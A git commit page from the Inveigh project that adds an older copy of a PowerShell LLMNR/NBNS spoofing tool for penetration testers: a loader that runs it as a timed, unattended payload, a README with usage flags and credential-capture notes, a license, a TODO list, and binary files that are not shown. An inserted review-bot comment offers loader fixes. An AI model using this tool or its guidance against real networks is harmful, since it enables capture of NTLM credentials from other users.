author | Kevin Robertson <robertsonk@gmail.com> | 2015-09-13 15:24:02 -0400 |
---|---|---|
committer | Kevin Robertson <robertsonk@gmail.com> | 2015-09-13 15:24:02 -0400 |
commit | 03334ecc2270b11d14f1f0a2268039387c7b1515 (patch) | |
tree | 8aca14e6085887c7bf0a74acaec3f1c4408e0d5f /old | |
parent | b7e2bb76537dd8c31feecbf817095a361914e55f (diff) | |
download | Inveigh-03334ecc2270b11d14f1f0a2268039387c7b1515.tar.gz Inveigh-03334ecc2270b11d14f1f0a2268039387c7b1515.zip |
Old version
Keeping the older version easily accessible until the new version is
tested more.
Diffstat (limited to 'old')
-rw-r--r-- | old/Inveigh-Loader.ps1 | 77 | ||||
-rw-r--r-- | old/Inveigh.ps1 | bin | 0 -> 73010 bytes | |||
-rw-r--r-- | old/LICENSE.md | 31 | ||||
-rw-r--r-- | old/README.md | 29 | ||||
-rw-r--r-- | old/TODO.md | 12 | ||||
-rw-r--r-- | old/inveigh.pfx | bin | 0 -> 2550 bytes |
6 files changed, 149 insertions, 0 deletions
diff --git a/old/Inveigh-Loader.ps1 b/old/Inveigh-Loader.ps1
new file mode 100644
index 0000000..5e4f4ac
--- /dev/null
+++ b/old/Inveigh-Loader.ps1
@@ -0,0 +1,77 @@
+<#
+.SYNOPSIS
+Inveigh Loader provides additional options for running Inveigh as an unattended payload.
+
+.DESCRIPTION
+Inveigh Loader can load Inveigh with set parameters and stop execution after specified amount of time. Inveigh can be either loaded as a separate script or through a scriptblock embedded within this script. If the scriptblock method is selected, the current Inveigh.ps1 code must be copied into the $inveigh_scriptblock below. This is a basic version, additional features will be added.
+#>
+
+# Inveigh loader parameters
+$run_length = 1 # Set the number of minutes Inveigh will run
+$start_job_method = "filepath" # Set the Job-Start method. filepath,scriptblock
+
+# Inveigh parameters - refer to Inveigh.ps1 for details
+$IP = ""
+$SpooferIP = ""
+$HTTP = "Y"
+$HTTPS = "N"
+$SMB = "Y"
+$LLMNR = "Y"
+$NBNS = "N"
+$NBNSTypes = @("20") # Format for multiples = @("00","20")
+$Repeat = "Y"
+$ForceWPADAuth = "Y"
+$Output = "0"
+$OutputDir = ""
+
+if(-not($IP))
+{
+ $IP = (Test-Connection 127.0.0.1 -count 1 | select -ExpandProperty Ipv4Address)
+}
+
+if(-not($SpooferIP))
+{
+ $SpooferIP = $IP
+}
+
+if(-not($OutputDir))
+{
+ $OutputDir = $PWD.Path
+}
+
+$inveigh_scriptblock =
+{ # begin $inveigh_scriptblock - paste Inveigh.ps1 code below this line if using $start_job_method = "scriptblock"
+
+} # end $inveigh_scriptblock
+
+try
+{
+ if ($start_job_method -eq "filepath")
+ {
+ Start-Job -Name Inveigh -FilePath .\Inveigh.ps1 -ArgumentList $IP,$SpooferIP,$HTTP,$HTTPS,$SMB,$LLMNR,$NBNS,$NBNSTypes,$Repeat,$ForceWPADAuth,$Output,$OutputDir | Out-Null
+ }
+ elseif ($start_job_method -eq "scriptblock")
+ {
+ Start-Job -Name Inveigh -ScriptBlock $inveigh_scriptblock -ArgumentList $IP,$SpooferIP,$HTTP,$HTTPS,$SMB,$LLMNR,$NBNS,$NBNSTypes,$Repeat,$ForceWPADAuth,$Output,$OutputDir | Out-Null
+ }
+ else
+ {
+ throw "Invalid $start_job_method."
+ }
+
+ $run_timeout = new-timespan -Minutes $run_length
+ $run_stopwatch = [diagnostics.stopwatch]::StartNew()
+
+ while ($run_stopwatch.elapsed -lt $run_timeout)
+ {
+ Receive-Job -name Inveigh
+ }
+
+}
+finally
+{
+ Stop-Job -name Inveigh
+ Receive-Job -name Inveigh
+ Remove-Job -name Inveigh
+ write-warning "Inveigh Loader exited at $(Get-Date -format 's')"
+}
diff --git a/old/Inveigh.ps1 b/old/Inveigh.ps1
Binary files differ
new file mode 100644
index 0000000..436d505
--- /dev/null
+++ b/old/Inveigh.ps1
diff --git a/old/LICENSE.md b/old/LICENSE.md
new file mode 100644
index 0000000..9790f29
--- /dev/null
+++ b/old/LICENSE.md
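Review bot: The `finally` block at the end of the hunk runs `Stop-Job`/`Receive-Job`/`Remove-Job` unconditionally, but on the `else` branch `Start-Job` never ran, so the `throw "Invalid $start_job_method."` error is followed by cannot-find-job errors from the cleanup that bury the real cause; wrapping the cleanup in `if (Get-Job -Name Inveigh -ErrorAction SilentlyContinue)` avoids that. The `while` loop only calls `Receive-Job`, which returns at once when the job has produced no output, so the loop spins at full CPU for the whole `$run_length`; a `Start-Sleep -Seconds 1` after `Receive-Job` keeps the behaviour at negligible cost. That error message also interpolates the value instead of naming the setting (a wrong value yields e.g. `Invalid foo.`), so `throw "Invalid start_job_method: '$start_job_method'."` would be clearer. Separately, `-FilePath .\Inveigh.ps1` and the `$OutputDir = $PWD.Path` default both resolve against the caller's working directory rather than the loader's own location, which is worth stating in the header comment if that is intended.
```powershell
# … unchanged: parameter setup and Start-Job dispatch …
    while ($run_stopwatch.elapsed -lt $run_timeout)
    {
        Receive-Job -Name Inveigh
        Start-Sleep -Seconds 1   # Receive-Job does not block; avoid spinning while the job is quiet
    }
}
finally
{
    # Start-Job never ran if the method check threw; skip cleanup so that error is not buried
    if (Get-Job -Name Inveigh -ErrorAction SilentlyContinue)
    {
        Stop-Job -Name Inveigh
        Receive-Job -Name Inveigh
        Remove-Job -Name Inveigh
    }
    write-warning "Inveigh Loader exited at $(Get-Date -format 's')"
}
```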
@@ -0,0 +1,31 @@
+Inveigh is provided under the 3-clause BSD license below.
+
+*************************************************************
+
+Copyright (c) 2015, Kevin Robertson
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+
+* Neither the name of Inveigh nor the names of its
+ contributors may be used to endorse or promote products derived from
+ this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/old/README.md b/old/README.md
new file mode 100644
index 0000000..2255b06
--- /dev/null
+++ b/old/README.md
@@ -0,0 +1,29 @@
+# Inveigh
+Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.
+
+# Requirements
+Tested minimums are PowerShell 2.0 and .NET 3.5.
+
+# Notes
+1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture.
+2. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
+3. SMB challenge/response captures are performed by sniffing over the host system's SMB service.
+4. HTTP challenge/response captures are performed with a dedicated listener.
+5. The local LLMNR/NBNS services do not need to be disabled on the host system.
+6. LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
+7. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
+8. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system.
+9. Output files will be created in current working directory.
+10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.
+
+# Usage
+Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass the PowerShell script execution policy.
+
+To execute with default settings:
+Inveigh.ps1
+
+To execute with features enabled/disabled:
+Inveigh.ps1 -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N -Output 0,1,2 -OutputDir 'valid folder path'
+
+# Screenshot
+
diff --git a/old/TODO.md b/old/TODO.md
new file mode 100644
index 0000000..f137a8c
--- /dev/null
+++ b/old/TODO.md
@@ -0,0 +1,12 @@
+## To Do
+- [ ] Code cleanup
+- [x] Add NBNS spoofer
+- [x] Add ability to capture NTLMv1 challenge/responses
+- [ ] Add ability to capture LM challenge/responses
+- [x] Add HTTP for challenge/response captures
+- [x] Add HTTPS for challenge/response captures
+- [x] Add Get-Help style comments
+- [ ] Add SMB listener
+- [ ] Add exfiltration method for captures
+- [ ] Add SMBRelay
+- [ ] Add wpad.dat
\ No newline at end of file
diff --git a/old/inveigh.pfx b/old/inveigh.pfx
Binary files differ
new file mode 100644
index 0000000..5fa7503
--- /dev/null
+++ b/old/inveigh.pfx |